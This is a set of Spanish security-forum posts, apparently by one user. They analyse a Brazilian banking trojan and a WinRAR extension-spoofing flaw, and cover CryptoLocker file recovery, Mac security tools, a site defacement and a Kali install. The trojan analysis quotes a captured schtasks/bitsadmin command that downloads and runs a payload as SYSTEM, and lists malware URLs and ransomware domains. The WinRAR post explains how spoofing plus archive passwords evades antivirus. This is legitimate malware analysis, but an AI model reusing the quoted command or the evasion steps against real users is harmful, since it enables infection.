hxtp://bit.ly/1ox7vYa
" width="1" height="1" /></p> </body> </html>

VT: https://www.virustotal.com/es/file/1784d146c729adc0586b4ee2b21de295987e47824f549b8e3e3d6dc3d6d21a57/analysis/1409643892/

Al hacer click sobre el texto nos descargará este archivo:

hxtp://bukhamees.com/highslide/graphics/cav.php --> hxtp://www.arnetltd.com/BoletoSetembro.zip

Archivo descomprimido: BoletoSetembro.cpl

Info sobre el dominio:
http://whois.domaintools.com/arnetltd.com

Citar
User ID at Hotmail.com:
USER_ID=mixelyx@hotmail.com

De momento el análisis ha sido algo estático, no tengo el otro sistema donde hago las pruebas a punto y de momento esto es lo que aporto.

Aquí teneis el análisis en Anubis:
https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&call=first
Traffic.pcap: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&download=traffic.pcap

Un dato curioso en el análisis de AI:

Citar"C:\WINDOWS\system32\cmd.exe" /c schtasks /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download /PRIORITY HIGH hxtp://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM

Echando un ojo al tráfio de datos se observa como desc arga otro archivo desde el siguiente dominio:
hxtp://gerenciador2015.com.br/

Descargará este otro archivo:
hxtp://gerenciador2015.com.br/a001/bitsadmin.exe

VT: https://www.virustotal.com/es/file/f910f378b99f06b5f936e7dc607d5991c39b676f4f2edcaae35a5d4262573968/analysis/1409701400/ --> 0 / 55

CitarEl archivo ya ha sido analizado
Este archivo ya fue analizado por VirusTotal el 2014-08-27 14:37:08 UTC, it was first analysed by VirusTotal on 2008-09-28 16:46:23 UTC.
Detecciones: 0/55
Puede ver el último análisis o reanalizarlo otra vez ahora.

AI: https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2

Saludos.

#337

Seguridad / Encuesta: En que fallan los antivirus?

8 Junio 2014, 02:32 AM

Viendo la actual guerra entre creadores de malware y los programas que intentan protegernos, en general, ¿en que os ha fallado vuestro antivirus, suite o firewall?
Sabemos que proteger todos los entornos actuales en el área de informática es tarea ardua, cada persona en función de sus hábitos de navegación y ejecución de programas, habrá tenido diferentes experiéncias.

No importa si es de pago o free.
Se pueden marcar varias opciones.
La encuesta es generalizada, no se intenta crear mala reputación a ninguna casa comercial.

Saludos y gracias por participar

#338

Seguridad / WinRAR File Extension Spoofing vulnerability

29 Mayo 2014, 16:58 PM

Hola, comentar sobre esta vulnerabilidad en Winrar, ingeniosa y fácil de llevar a cabo con éxito.
La primera referéncia la encuentro sobre marzo de 2014, supongo pueda ser un poco más antigua pero que se ha de tener en cuenta pues puede ser otro posible foco de infección.

Referéncias:

http://www.exploit-db.com/papers/32480/

http://an7isec.blogspot.co.il/2014_03_01_archive.html

http://intelcrawler.com/report_2603.pdf

http://www.youtube.com/watch?v=P5OAAoptv6E#t=11

http://thehackernews.com/2014/04/winrar-file-extension-spoofing.html

Curioso que en versiones anteriores no funcionaba, por ejemplo con la versión 3.7 podemos hacer la modificación al archivo con el editor hexadecimal, pero al intentar abrir el archivo lo ejecuta por la asociación de archivo por defecto del sistema, entonces nos da un error, ya sea con el reproductor de windows media si modificamos la extensión a .mp3, png u otro formato de archivo.

Versiones afectadas:

< v3.70: NO
v4.20: SI
v5.01: SI
v5.10(beta4): NO

A continuación se expone la forma de modificar el archivo, como posibles formas de ver el archivo sin llegarlo a ejecutar y de esta forma no infectarnos.
Para el PoC utilicé un ejecutable de SysInspector de ESET:

El fallo consiste en poder modificar el nombre mediante un editor, editando el último nombre del archivo. Abrimos el archivo comprimido con un editor hexadecimal:

Podemos usar el comando "buscar" o manualmente para localizar el segundo nombre dentro del código:

Modificamos la extensión de archivo a imagen tipo png o archivo de música mp3, en este caso elegí .mp3:

En las opciones de Winrar, podemos elegir mejor compresión, comentarios y el password necesario para pasar los antivirus.
Una vez creado el nuevo archivo comprimido modificado, le echamos un vistazo:

Modificaciones del archivo y resultado:

Viendo las propiedades del nuevo archivo modificado:

Propiedades del archivo desde el análisis en VirusTotal:

Aquí el error que comentaba si se dispone de una versión de Winrar < 4.20:

En esta captura podemos observar un .zip modificado enviados masivamente al correo (cortesía TheHackerNews):

Otra prueba que hice fue cojer un archivo infectado y alta tasa en VT (35/53) y realizar la modificación con extensión .mp3. Con un password débil este fue el resultado:

Musica.zip

SHA256:    5aa2e11777fe646dfadead0b3f492a690032f99bd7a460eb93c63ce044b79497
Nombre:    musica.zip
Detecciones:    2 / 53
https://www.virustotal.com/es/file/5aa2e11777fe646dfadead0b3f492a690032f99bd7a460eb93c63ce044b79497/analysis/1401131332/

CitarNANO-Antivirus Trojan.Script.Dinihou.cuefgi
Qihoo-360 virus.exp.20140401

Un password un poco más largo:

SHA256:    4d9e8cfd6f920d28ca7bdeb1d91b433de07279ecd7e8d8a34fe294343a9fd5f6
Nombre:    musica.zip
Detecciones:    1 / 53
https://www.virustotal.com/es/file/4d9e8cfd6f920d28ca7bdeb1d91b433de07279ecd7e8d8a34fe294343a9fd5f6/analysis/1401131956/

CitarQihoo-360 virus.exp.20140401

Otro claro ejemplo de que los antivirus no hacen bien su faena, cojemos un ejecutable limpio "SysInspector.exe" (Eset) y hacemos
la modificación al archivo (protegido con password), el resultado es este:

https://www.virustotal.com/es/file/026ca98e4e52c7296eb733a387eb22a1f17aba1757bc0bb48e468803b1385008/analysis/1401199917/ --> 1/53

La misma firma para un ejecutable limpio como para uno infectado:

Qihoo-360 virus.exp.20140401

Vería más lógico una descripción de firma tipo "Mod.ext.20140401", aunque nuca está demás ya sabiendo que el archivo ha sido modificado colocar esa alerta tipo "virus.exp.FECHA".

Ahora podremos ver un par de formas, para que cuando nos llegue un correo similar podamos ver sin llegar a infectarnos si se trata de una imagen real o se ha modificado.
Podemos hacer uso del mismo editor hexadecimal para ver su contenido y fijarnos en la cabecera del archivo:

Podemos ver como el inicio de la cabecera es típica de un ejecutable "MZ".
Para imagenes .bmp (BM)
Para imagenes .jpg (ÿØÿà..JFIF)

Mediante el mismo Winrar, desde el menú Commands --> View File, se nos abre un editor en ventana nueva, donde podemos ver en texto plano el código del archivo:

Otra forma es visualizar las Strings del archivo, también podmeos ver si se trata de una imagen o un ejecutable:

No se si el error será solucinable, de momento las últimas versiones están todas afectadas.

PD:
Comentar que solo funciona siempre y cuando creemos el archivo mediante Winrar cambiando la extensión a .zip antes de crear el archivo comprimido. Puedes hacer la prueba con extensión .rar y se dañará el archivo.

Saludos.

#339

Noticias / Cyberthreat Map (Mapa en tiempo real - Malware)

9 Mayo 2014, 04:53 AM

Hola comentar de este nuevo servicio de KasperskyLabs donde han creado un mapa interactivo en 3D para ver en tiempo real y por zonas geográficas los incidentes de seguridad cibernética:

http://cybermap.kaspersky.com/

Aquí otro servicio de PandaLabs:

http://www.pandasecurity.com/img/enc/infection_spain.htm

Anteriormente podíamos ver el servicio de Hneynet pero actualmente no se actualiza o almenos no responde.

Saludos.

#340

Seguridad / MOVIDO: Herramientas gratuitas de seguridad para MAC

26 Noviembre 2013, 17:27 PM

El tema ha sido movido a Mac OS X.

http://foro.elhacker.net/index.php?topic=403646.0

#341

Mac OS X / Herramientas gratuitas de seguridad para Mac OS X

26 Noviembre 2013, 12:27 PM

Guía rápida para la descarga de herramientas gratuitas para la seguridad y desinfección de malware.
Herramientas específicas para la plataforma de Mac.
Clasificada por categorías con descarga directa.

Antivirus:

Avast:
Web: http://www.avast.com/es-ww/free-antivirus-mac
D.Directa: http://download.ff.avast.com/mac/avast_free_mac_security.dmg

ClamXav:
Web: http://www.clamxav.com/
iTunes: http://itunes.com/mac/ClamXav
D.Directa: http://www.clamxav.com/downloads/ClamXav_2.7.dmg
Guía: http://www.clamxav.com/documentation.php

Sophos Home Edition:
Web: http://www.sophos.com/es-es/products/free-tools/sophos-antivirus-for-mac-home-edition.aspx
D.Directa: http://downloads.sophos.com/home-edition/savosx_he_r.zip
Checksum: http://downloads.sophos.com/home-edition/savosx_he_r.sha256.txt

Avira Free Mac Security:
Web: http://www.avira.com/es/avira-free-mac-security
D.Directa: http://www.avira.com/es/download-start/product/avira-free-mac-security
http://install.avira-update.com/package/wks_avira/osx/int/pecl/Avira_Free_Antivirus_for_Mac.pkg
Guía: http://www.avira.com/documents/products/pdf/es/howto_avira_mac_security_en.pdf

VirusBarrier Express:
Web: https://itunes.apple.com/es/app/id411642093?mt=12&affId=332534

Bitdefender Virus Scanner:
Web: http://www.bitdefender.com/solutions/virus-scanner-for-mac.html
Descarga: https://itunes.apple.com/us/app/bitdefender-virus-scanner/id500154009
Guía: http://download.bitdefender.com/resources/media/materials/2012/en/macfree/datasheet.pdf

Antispyware:

MacScan:
Web: http://macscan.securemac.com/
D.Directa: http://macscan.securemac.com/download/
Info: http://macscan.securemac.com/about/

Dr.Web:
Web: http://www.freedrweb.com/drweb+mac+light/?lng=en
D.Directa: http://download.geo.drweb.com/pub/drweb/mac/Light/drweb-light-606-macosx.dmg
Guía: http://download.geo.drweb.com/pub/drweb/mac/doc/Light/

Firewall:

WaterRoof (amplía funcionalidades del firewall nativo):
Web: http://www.hanynet.com/waterroof/index.html
D.Directa: http://www.hanynet.com/waterroof-3.8.zip

LittleSnitch:
Web: http://www.obdev.at/products/littlesnitch/index.html
D.Directa: http://www.obdev.at/downloads/littlesnitch/LittleSnitch-3.5.dmg

Antirootkit:

OS X Rootkit Hunter:
Web: http://www.christian-hornung.de/
D.Directa: http://www.christian-hornung.de/binary/OS-X-Rootkit-Hunter-0.2.dmg

Optimización y limpieza:

CCleaner:
Web: http://www.piriform.com/mac/ccleaner
D.Directa: http://download.piriform.com/mac/CCMacSetup109.dmg
Guía: http://www.piriform.com/docs/ccleaner-for-mac

Onyx:
Web: http://www.titanium.free.fr/
Descarga: http://www.titanium.free.fr/downloadonyx.php
D.Directa (OS X 10.9): http://joel.barriere.pagesperso-orange.fr/dl/109/OnyX.dmg

Magican:
Web: http://www.magicansoft.com/
D.Directa: http://www.magicansoft.com/download/Magican.pkg
Guía: http://www.magicansoft.com/pdf/magican-user-guide.pdf

Maintenance:
Web: http://www.titanium.free.fr/
Descarga: http://www.titanium.free.fr/downloadmaintenance.php
D.Directa (OS X 10.9): http://joel.barriere.pagesperso-orange.fr/dl/109/Maintenance.dmg

Redes:

Wireshark:
Web: http://www.wireshark.org/
D.Directa (x32): http://www.wireshark.org/download/osx/Wireshark%201.10.5%20Intel%2032.dmg
D.Directa (x64): http://www.wireshark.org/download/osx/Wireshark%201.10.5%20Intel%2064.dmg
Guía: http://www.wireshark.org/docs/

Cocoa Packet Analyzer: Sniffer nativo.
Web: http://www.tastycocoabytes.com/cpa/
D.Directa: http://tastycocoabytes.com/_downloads/CPA_121.dmg
Plugins: http://www.tastycocoabytes.com/cpa/plugins.php

Nmap:
Web: http://nmap.org/download.html#macosx
D.Directa: http://nmap.org/dist/nmap-6.40-2.dmg
Source: http://nmap.org/book/inst-macosx.html#inst-macosx-source
Info: http://nmap.org/book/inst-macosx.html

KisMac:
Web: http://trac.kismac-ng.org/wiki/Downloads
D.Directa: http://update.kismacmirror.com/binaries/KisMAC-0.3.3.dmg
Info: http://trac.kismac-ng.org/wiki

Análisis forense:

OS X Auditor: herramienta gratuita de análisis forense para Mac OS X
Web: https://github.com/jipegit/OSXAuditor
Info: https://github.com/jipegit/OSXAuditor/blob/master/README.md

Plugins navegador:

AVG LinkScanner:
Web: http://free.avg.com/es-es/linkscanner-mac
D.Directa: http://aa-download.avg.com/filedir/inst/avg_lsm_stf_all_2012_1815.dmg

Dr.Web LinkChecker:
Web: http://www.freedrweb.com/linkchecker/safari/
D.Directa: http://download.geo.drweb.com/pub/drweb/linkchecker/Safari/2.0/safari.linkchecker.safariextz

Bitdefender TrafficLight:
Web: http://www.bitdefender.es/solutions/trafficlight.html
D.Directa: http://download.bitdefender.com/npd/trafficlight/extensions/safari/TrafficLight.safariextz

Varios:

FlashbackChecker: Herramienta para eliminar infección por Flashback.
Web: https://github.com/jils/FlashbackChecker/wiki
D.Directa: https://github.com/downloads/jils/FlashbackChecker/FlashbackChecker.1.0.zip
Información: http://support.apple.com/kb/HT5247
Via Updates: http://support.apple.com/kb/HT1338

DNSChanger Trojan Horse:
Web: http://www.dnschanger.com/
D.Directa: http://macscan.securemac.com/files/DNSChangerRemovalTool.dmg

Prey: Encuentra un Mac robado
Web: http://preyproject.com/download
D.Directa: https://s3.amazonaws.com/prey-releases/bash-client/0.6.1/prey-0.6.1-mac.dmg
Info: http://preyproject.com/faq

TrueCrypt:
Web: http://www.truecrypt.org/
D.Directa: http://www.truecrypt.org/download/TrueCrypt%207.1a%20Mac%20OS%20X.dmg
Guía: http://www.truecrypt.org/docs/

Backup: Guía para hacer copias de seguridad en entorno Mac.
Web: http://www.apple.com/es/support/backup/

Consejos de seguridad para tu Mac:
Web: http://blog.segu-info.com.ar/2013/04/12-consejos-de-seguridad-para-tu-mac.html#axzz2lhYAJl8G

Actualizado: 26/12/2014

#342

Seguridad / Restaurar archivos cifrados por CryptoLocker [Ransomware]

24 Noviembre 2013, 15:13 PM

CryptoLocker Ransomware.

Información:
http://en.wikipedia.org/wiki/CryptoLocker
http://www.us-cert.gov/ncas/alerts/TA13-309A
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2945
http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information
http://www.kyrus-tech.com/cryptolocker-decryption-engine/

Se han dado casos en los que la recuperación de algunos archivos se hacía imposible, incluso habiendo adquirido legitimamente la clave correcta.
El motivo principal es que se movían los archivos a otra unidad, debido a esto no se recuperaban correctamente.
Se creó este Script para intentar recuperarlos.

http://chief-01.deviantart.com/art/Crypto-Unlocker-UPDATED-V1-1-413774308

Web: https://github.com/appurify/appurify-python/tree/master/pycrypto
D.Directa (x32): https://github.com/appurify/appurify-python/blob/master/pycrypto/pycrypto-2.6.win32-py3.3.exe
D.Directa (x64): https://github.com/appurify/appurify-python/blob/master/pycrypto/pycrypto-2.6.win-amd64-py3.3.exe

Web: https://github.com/kyrus/crypto-un-locker
Script: https://github.com/kyrus/crypto-un-locker/blob/master/CryptoUnLocker.py

Es posible extraer la clave privada desde el registro (HKCU\Software\CryptoLocker) a archivo .reg y guardar donde ejecutes el Script.

Otra opción (automatizada) para restaurar los archivos cifrados:

Panda Ransomware Decrypt:
Web: http://www.pandasecurity.com/spain/homeusers/support/card?id=1675
D.Directa: http://www.pandasecurity.com/resources/tools/pandaunransom.exe
Guía: http://www.pandasecurity.com/spain/homeusers/support/card?id=1675

CryptoLocker Decryption Service (Servicio online):

Usar Tor2web (http://tor2web.org) o TorBrowser (https://www.torproject.org/download/download) para entrar:

Link directo desde Tor2web:
https://f2d2v7soksbskekh.tor2web.org

Herramienta que buscará los archivos que han sido cifrados:

CryptoLocker Scan Tool (necesario NET 4.5):
Web: http://omnispear.com/tools/cryptolocker-scan-tool
D.Directa: https://www.dropbox.com/s/ciw1rdzri8ghyfo/OCF_20131025.zip

Otros metodos para tratar de restaurar los archivos afectados, aunque no se garantiza nada:

Se puede tratar de restaurar versiones anteriores de estos archivos usando una funcionalidad integrada de Windows o una aplicación conocida como ShadowExplorer.

- Obtención de los archivos de nuevo el uso de la funcionalidad de versiones anteriores.
Windows tiene una característica nativa, donde se puede hacer clic derecho sobre un archivo, seleccione Propiedades y seleccione la pestaña llamada versiones anteriores. Una vez hecho esto para un archivo en particular, verá todas las versiones de la misma que se copiaron y se almacenan en el llamado Volume Shadow Copy. La ficha también proporciona la historia de estas copias de seguridad por fecha.
Con el fin de restaurar la versión necesaria del archivo, haga clic en el botón Copiar y luego elegir la ubicación en la que este archivo va a ser restaurada. En caso de que usted desea reemplazar el archivo existente con su versión restaurada, haga clic en el botón Restaurar en su lugar. Puede restaurar carpetas enteras de la misma manera.

- Restauración de archivos cifrados con la utilidad ShadowExplorer:
Además de la funcionalidad nativa de Windows, puede utilizar una aplicación que puede restaurar la versión anterior de carpetas enteras para usted. Se llama ShadowExplorer. Una vez que descargue y ejecute este programa, mostrará todas las unidades, así como una lista de las fechas en que se generaron las instantáneas. Sólo tiene que elegir la unidad y la fecha para la restauración deseada

Web: http://www.shadowexplorer.com
D.Directa: http://www.shadowexplorer.com/uploads/ShadowExplorer-0.9-setup.exe

Herramientas de ayuda a la prevención contra CryptoLocker:

CryptoPrevent (Beta):
Web: http://www.foolishit.com/vb6-projects/cryptoprevent/
D.Directa: http://www.foolishit.com/download/cryptoprevent-installer/
D.Directa (portable): http://www.foolishit.com/download/cryptoprevent/

Cryptolocker Prevention Kit:
Web: http://www.thirdtier.net/2013/10/cryptolocker-prevention-kit-updates/
D.Directa: http://www.thirdtier.net/downloads/CryptolockerPreventionKit.zip

HitmanPro's CryptoGuard:
Web: http://www.surfright.nl/en/alert/cryptoguard
D.Directa: http://dl.surfright.nl/hmpalert25.exe
Video demostrativo: http://www.youtube.com/watch?feature=player_embedded&v=5M8YYnXIAlw

Se adjuntan varios programas que ayudarán a eliminar la infección automáticamente, a pesar de como se ha comentado los ficheros
aún seguirán cifrados.

Malwarebytes antimalware:
- Web: http://es.malwarebytes.org/
- D.Directa: http://es.malwarebytes.org/mwb-download

Hitman Pro:
- Web: http://www.surfright.nl/en/downloads/
- D.Directa (32 bits): http://dl.surfright.nl/HitmanPro.exe
- D.Directa (64 bits): http://dl.surfright.nl/HitmanPro_x64.exe
- Guía pdf: http://files.surfright.nl/hmp-brochure-en.pdf

* Por lo que he podido ver, tan solo van cambiando el nombre al dominio, dejando el nombre final de ejecutable como "1002.exe" (http:/[random]/1002.exe)
Domains:

CitarObject URL # Requests
wqvnkgtquoixx.com/home/
jbkoqywkqjpjji.net/home/
keqrmonphudew.net/home/
miuongoruxtuhy.biz/home/
qipixdjsccnyc.biz/home/
pfasmsxcpsfkle.biz/home/
evkmaldroiifk.ru/home/
saallnwetwuac.org/home/
ygvnalgjbukky.info/home/
aiqyntcdnvfyy.com/home/
bxgqnvtusprlg.net/home/
cabcbepofqmaw.biz/home/
upalbsjwadwmy.ru/home/
qtnwayrgotgvf.info/home/
trusflrovxooa.ru/home/
vruwobfqmerby.org/home/
nqjfxvpobfgss.net/home/
otauuhgyfkeyx.info/home/
xjfaclsceyycp.info/home/
rjydbnflxdqfo.com/home/
fyafqsphgcwpn.net/home/
sejfjeaeybkcf.biz/home/
suiqcimovbpqnc.info/home/
gtkhyjkahaqmn.ru/home/
pyduriwnnvmyh.org/home/
hjivfvfffwnskq.net/home/
ejoypeccwsmgn.com/home/
aejmsdjdnlxpo.net/home/
ligpryhpqpdwne.com/home/
bikasivqvqovf.biz/home/
bytobtevojrmf.ru/home/
uycjwfvptmknld.com/home/
cducbyqjwoisf.org/home/
yxorjdnsljkpj.info/home/
yoxgrovxecngq.com/home/
ottxtmpqbfivg.biz/home/
vvopcjmnxbhbwc.ru/home/
asytrtilmhemq.net/home/
gctqpdxpmfmir.biz/home/
juuquupfwkohs.biz/home/
bryjvxpmikgjtg.ru/home/
itetdtsollwar.org/home/
rspqurslksuqf.info/home/
kdfwnedtksawjy.biz/home/
etrwsvkcdukdlg.ru/home/
erxigxprcxick.info/home/
rhykvgjqlqkis.com/home/
gjiltokqbestr.net/home/
tyjnjwepkwuaq.biz/home/
oweahscscnpoo.ru/home/
taesdijrndsatw.org/home/
pbfnhbxmlmkyo.org/home/
mmirxnturglis.com/home/
oesuleotqmvaa.biz/home/
pitilmknalqkq.ru/home/
iigcbmauiqvfba.ru/home/
fuoxdmpthwgih.org/home/
gpyalwdsbfdvf.info/home/
tfacbcnojejgn.com/home/
besvehfusgclh.net/home/
cydxmrstmoyyx.ru/home/
poeacwdpunfjg.org/home/
qydbouvxduubsr.ru/home/
okjjdmhkqnkgf.com/home/
pokwdrtxysbmf.net/home/
yeiviemnuxabpv.com/home/
ooltxrisjwradh.org/home/
jydfvwjmiojvs.biz/home/
kdesvcvaqtacj.ru/home/
ktnhehwlcwgjj.org/home/
tnjlrciuvwfam.info/home/
hdknhkctfphgu.com/home/
vftofmvgnrmbt.net/home/
pwnjswxvhgbdm.ru/home/
lyooqnqqhotjju.biz/home/
lohwjyiyqkwfqi.info/home/
mclqdpsghdjqje.ru/home/
dmolifruqydju.org/home/
feyovpfgitkkl.info/home/
citujrmxlfigj.com/home/
dmuijairuedqj.net/home/
eaexwcajdaphq.biz/home/
feflwkvdmykrh.ru/home/
xrxskmcywoeju.org/home/
ajivxwpkojlku.info/home/
odfkpkipydkslh.net/home/
bnjjxflexigul.com/home/
ryyyyfgfvtsnct.info/home/
mnfdfpdotefros.net/home/
uwdykbjtyjnkje.biz/home/
vvbfgrejcdvwje.org/home/
ggltstdpfixlmg.com/home/
ttgwxyheyuxdud.net/home/
laqigkmwntydsb.biz/home/
xarbteoehyyaik.net/home/
myoocbhmqnhpjy.org/home/
opalnungbnmmot.org/home/
jxvaxrprklbjlm.info/home/
kaqiuwvbeulwci.com/home/
yvbswhukhiskve.net/home/
kwtgtikhnfjvjl.net/home/
nkbxareutxbqjc.ru/home/
bxvbfarpkqqerj.org/home/
dttreqmrlsedie.info/home/
neegqpcrrrqvut.biz/home/
tspwdnloqrybym.com/home/
rbjkbglbcucwua.org/home/
ksxfginiuiagub.info/home/
twhbawgddwpvuw.info/home/
fkccpkpsimeybd.com/home/
pyocsnovymedni.net/home/
qbjkpveipcyunx.biz/home/
kmwxovbjqgjmad.com/home/
rumsrejxaorcum.ru/home/
ffbxddujmmpsxl.biz/home/
swhbomykqemtll.org/home/
sxwfupthcyeqjh.net/home/
cpgpwafuancriy.org/home/
adjkrhdkuxysov.biz/home/
nqenwmhyokyknc.ru/home/
bxjlbrafmvaobr.ru/home/
bchqnrqmbdkvfl.org/home/
icmiuojikeeglw.info/home/
jehqrtprenotca.com/home/
fvmfpbqlweuqcc.org/home/
lwfhkayvijlhld.info/home/
guklllendjgtct.info/home/
avprsocmlqjigs.ru/home/
gecmmdcdjwpjlp.org/home/
iaadlnplnoarlk.info/home/
rpayeuhoyexfpe.net/home/
vnugqvdgehpfkw.com/home/
rbxjldlktkpsjx.org/home/
mqipmcwrvlbxlw.com/home/
nsdxjkmembvpcv.net/home/
gkdtedfdjppeuj.ru/home/
nqcfresqxteaxk.biz/home/
bgdeqjwfchhvwq.ru/home/
tvelvheabunfpq.biz/home/
adgceuhdxrinww.biz/home/
vukflsvgxbgvui.ru/home/
wylroxcpcqgjle.org/home/
xxjxkowffkovlp.info/home/
uwqjgsrxuhyopp.net/home/
jdtwkyaduxkmve.com/home/
erbxffpmhwjmwq.com/home/
urndyegetlhnwl.biz/home/
truhmarggnfawj.org/home/
vnsxlqmihpsywr.info/home/
tlxpdlcqaglewt.ru/home/
hbyoctplnodrvn.org/home/
daetjwkwtfhjwj.info/home/
fvckinfyuhuinp.net/home/
atiyxjksylosbu.biz/home/
xiyefnrwyvdcth.com/home/
lrvlcsbkbnljsx.net/home/
yhwkbxfyfbofbu.biz/home/
uycyyswttiedtd.info/home/
swgfawqxupccrf.com/home/
tbhrdcwhyfcpib.net/home/
uafxymkjfknspa.ru/home/
pnjatcvupcddtl.info/home/
qrkmwhcetrdqtc.com/home/
qtqhbembdaeyrl.net/home/

** Se me ocurrió que para tener a salvo archivos importantes en cualquier unidad de disco, se podría modificar la extensión real del fichero por una inventada.
Tanto en variantes como en nuevas versiones se infectan extensiones de archivos conocidas.

Citar*.odt, *.ods, *.odp, *.odm, *.odc, *.odb, *.doc, *.docx, *.docm, *.wps, *.xls, *.xlsx, *.xlsm, *.xlsb, *.xlk, *.ppt, *.pptx, *.pptm, *.mdb, *.accdb, *.pst, *.dwg, *.dxf, *.dxg, *.wpd, *.rtf, *.wb2, *.mdf, *.dbf, *.psd, *.pdd, *.eps, *.ai, *.indd, *.cdr, ????????.jpg, ????????.jpe, img_*.jpg, *.dng, *.3fr, *.arw, *.srf, *.sr2, *.bay, *.crw, *.cr2, *.dcr, *.kdc, *.erf, *.mef, *.mrw, *.nef, *.nrw, *.orf, *.raf, *.raw, *.rwl, *.rw2, *.r3d, *.ptx, *.pef, *.srw, *.x3f, *.der, *.cer, *.crt, *.pem, *.pfx, *.p12, *.p7b, *.p7c

Si tenemos un documento .pdf por ejemplo y es de valor por ser una trabajo o proyecto, podemos cambiar solo la extensión a documento.xx,
por lógica el malware no haría la modificación de cifrado al archivo.
El creador del ransomware puede decirle al programa que tipo de extensión cifrar pero no podría infectar toda extensión de archivo
existente. Bueno poder podría, pero no le sería de mucha utilidad si la finalidad es puramente economica.

Saludos.

#343

Noticias / Deface a Forospyware por segunda vez

16 Agosto 2013, 00:28 AM

Hola comentaros que han defaceado Forospyware de la misma forma que hace un par de años, y por el mismo haxor o grupo

Si quereis ver el deface de hace un par de años, se documentó en el foro de Skapunky:
http://killtrojan.forum6.biz/t777-modificaciones-ajenas-en-el-server-de-forospyware

Si quereis ver una captura del actual desde la caché aun se puede ver:
http://webcache.googleusercontent.com/search?q=cache:MNlzrkzGgKQJ:www.forospyware.com/windows-7/index208.html+&cd=1&hl=es&ct=clnk&gl=es&client=firefox-a

Mensaje:

Citar~ Hi Master ~

Hacked by | Egyptian.H4x0rZ

Gr33tz to : Hcj - Cyber-1st - h311 c0d3

#Hackers r0x Lamerz Sux

#Contact : Twitter.com/1337blackhat

#Nobody listens until you say something wrong

G00d bye

Fecha: jueves, 15 de agosto de 2013

De momento no está solucionado, el server está OFF y no hay acceso, ya irán informando desde su twiter.

Saludos.

#344

GNU/Linux / Kali Linux - A project of Offensice Security

5 Abril 2013, 04:04 AM

Hola hoy me dispuse a instalar y probar bajo VirtualBox la nueva distro de Offensive Security Kali Linux:

Capturas de instalación:

Elección del idioma:

Contraseña:

Configuración de zona horaria:

Formas de particionado del disco:

En mi caso elegí la configuración de LVM (Logical Volume Manager) de forma cifrada:

- Guiado – utilizar todo el disco: el asistente creará dos particiones (raíz y swap).
- Guiado – utilizar el disco completo y configurar LVM: se crea una partición de arranque (boot) y un volumen físico que contendrá dos volúmenes lógicos (raíz y swap).
- Guiado – utilizar todo el disco y configurar LVM cifrado: igual que el anterior pero en este caso se cifra el volumen lógico que contiene la raíz.
- Manual: nos permite particionar como queramos. Con o sin LVM, cifrando o sin cifrar y creando el número de particiones que necesitemos.

Particionando el disco:

Puedes elegir la primera opción en caso de duda, hará todo de forma automática:

Configurando el particionado:

Cifrando la partición, elegir una contraseña robusta:

Confirmar los cambios a realizar en particiones:

Web: http://www.kali.org/
Foro: http://forums.kali.org/forum.php?s=d22fdfb4025d98fdbb4026e6ee76c19c
Documentación: http://www.kali.org/news/kali-linux-whats-new/
Descarga: En el casillero "Window Manager" podemos ver dos opciones la ISO completa y una versión Lite de 20 MB (X32) y 23 MB (x64) que aún no he probado, disponible para ambas arquitecturas.

32 bits:
D.Directa: http://archive-4.kali.org/kali-images/kali-linux-1.0.2-i386.iso
Filename: kali-linux-1.0.2-i386.iso
sha1sum: ae6e3adcabed1c73689ff1da58c67183b435acf6
Size (MB): 2418

64 bits:
D.Directa: http://archive-4.kali.org/kali-images/kali-linux-1.0.2-amd64.iso
Filename: kali-linux-1.0.2-amd64.iso
sha1sum: 95070bb6fb078bd46e333914920eed6c708fcea4
Size (MB): 2327

Al final no pude instalarlo en en pc donde tengo las virtuales por problemas de compatibilidad con el tipo de procesador y lo instalé en el portátil, ahí se ejecutó sin problemas.
Adjunto las capturas, el estilo me gustaba más el de Backtrack:

Saludos.

#345

Seguridad / Plugins para los navegadores (FF, IE, O, M, CD, S)

20 Febrero 2013, 00:03 AM

#346

Análisis y Diseño de Malware / Troyano bancario II (diferente configuración).

16 Febrero 2013, 14:34 PM

Del mismo contacto de correo recibo otra muestra, actúa de forma diferente y descarga una buena batería de archivos.
En esta ocasión analicé el ejecutable mediante "Buster Sandbox".

URL: Pedir por MP.

Análisis online:

Comprovante.pdf.exe:
Virutotal: https://www.virustotal.com/file/a8dd1f76473cb69e7012964a5d723cb81014a13413df572735c7ae28b9e297cd/analysis/1360255230/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1a9a78b746cd486e4adb6aa28bdf02761&call=first

Archivos descargados:

jjca.dll:
Virutotal: https://www.virustotal.com/file/fa3651cfcd2aca6c7303ef8017986669465b724dc96ceaddcb249f66b487d420/analysis/1360254397/
Anubis: http://anubis.iseclab.org/?action=result&task_id=18c69386fee0475e4d56e22cb9bc33ac6

jsob.exe:
Virutotal: https://www.virustotal.com/file/d4ae23bf307150d9fd664eaac06bcce9d2101d946089a506b25f3f84d8248a8e/analysis/1360254575/
Anubis:

jsobs.exe:
Virutotal: https://www.virustotal.com/file/e914bda041273705403f2a968f557f67053b609daae77ca37c05f97d922a9261/analysis/1360254739/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1d19bec75e40ba5e461ef3b2548210e08

Projeto.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360254942/
Anubis: http://anubis.iseclab.org/?action=result&task_id=161f701d97b086d7421afd1ae0c2ba446

winsa64.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360255019/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1abaf0d0a6553c1e4bda858417f3f38f7&call=first

Compresión y compilado:

Ejecución de Comprovante.pdf.exe:

Código [Seleccionar]

Executing: c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
